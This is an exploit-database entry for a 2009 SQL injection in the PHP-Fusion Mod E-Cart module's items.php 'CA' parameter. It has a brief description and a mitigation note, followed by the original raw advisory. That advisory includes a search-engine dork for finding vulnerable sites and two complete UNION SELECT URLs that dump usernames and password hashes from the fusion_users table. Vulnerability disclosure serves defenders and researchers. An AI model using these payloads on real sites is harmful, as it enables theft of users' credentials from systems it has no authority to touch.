PHP-Fusion Mod E-Cart Sql Injection

vendor:

Mod E-Cart

by:

Sina Yazdanmehr (R3d.W0rm)

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Mod E-Cart

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

PHP-Fusion Mod E-Cart Sql Injection

A SQL injection vulnerability exists in the PHP-Fusion Mod E-Cart, which allows an attacker to extract sensitive information from the database. The vulnerability is caused due to the improper sanitization of user-supplied input in the 'CA' parameter of the 'items.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable script. This will allow the attacker to extract sensitive information from the database.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of the software.

Source

Exploit-DB raw data:

#####################################################################################
####                    PHP-Fusion Mod E-Cart Sql Injection                      ####
#####################################################################################
#                                                                                   #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                                #
#Discovered by : Sina Yazdanmehr (R3d.W0rm)                                         #
#Our Site : Http://IRCRASH.COM                                                      #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi
#####################################################################################
#                                                                                   #
#Download : http://www.phpfusion-mods.net/infusions/downloads/dldb.php?op=view&id=281
#                                                                                   #
#Dork : inurl:/infusions/e_cart                                                     #
#                                                                                   #
#####################################################################################
#                                      [Bug]                                        #
#                                                                                   #
#Username : http://Site/[path]/infusions/e_cart/items.php?CA=-9999'%20union%20select%20user_name,1,2%20from%20fusion_users/*
#                                                                                   #
#Password : http://Site/[path]/infusions/e_cart/items.php?CA=-9999'%20union%20select%20user_password,1,2%20from%20fusion_users/*
#                                                                                   #
#####################################################################################
#                           Site : Http://IRCRASH.COM                               #
###################################### TNX GOD ######################################

# milw0rm.com [2009-01-07]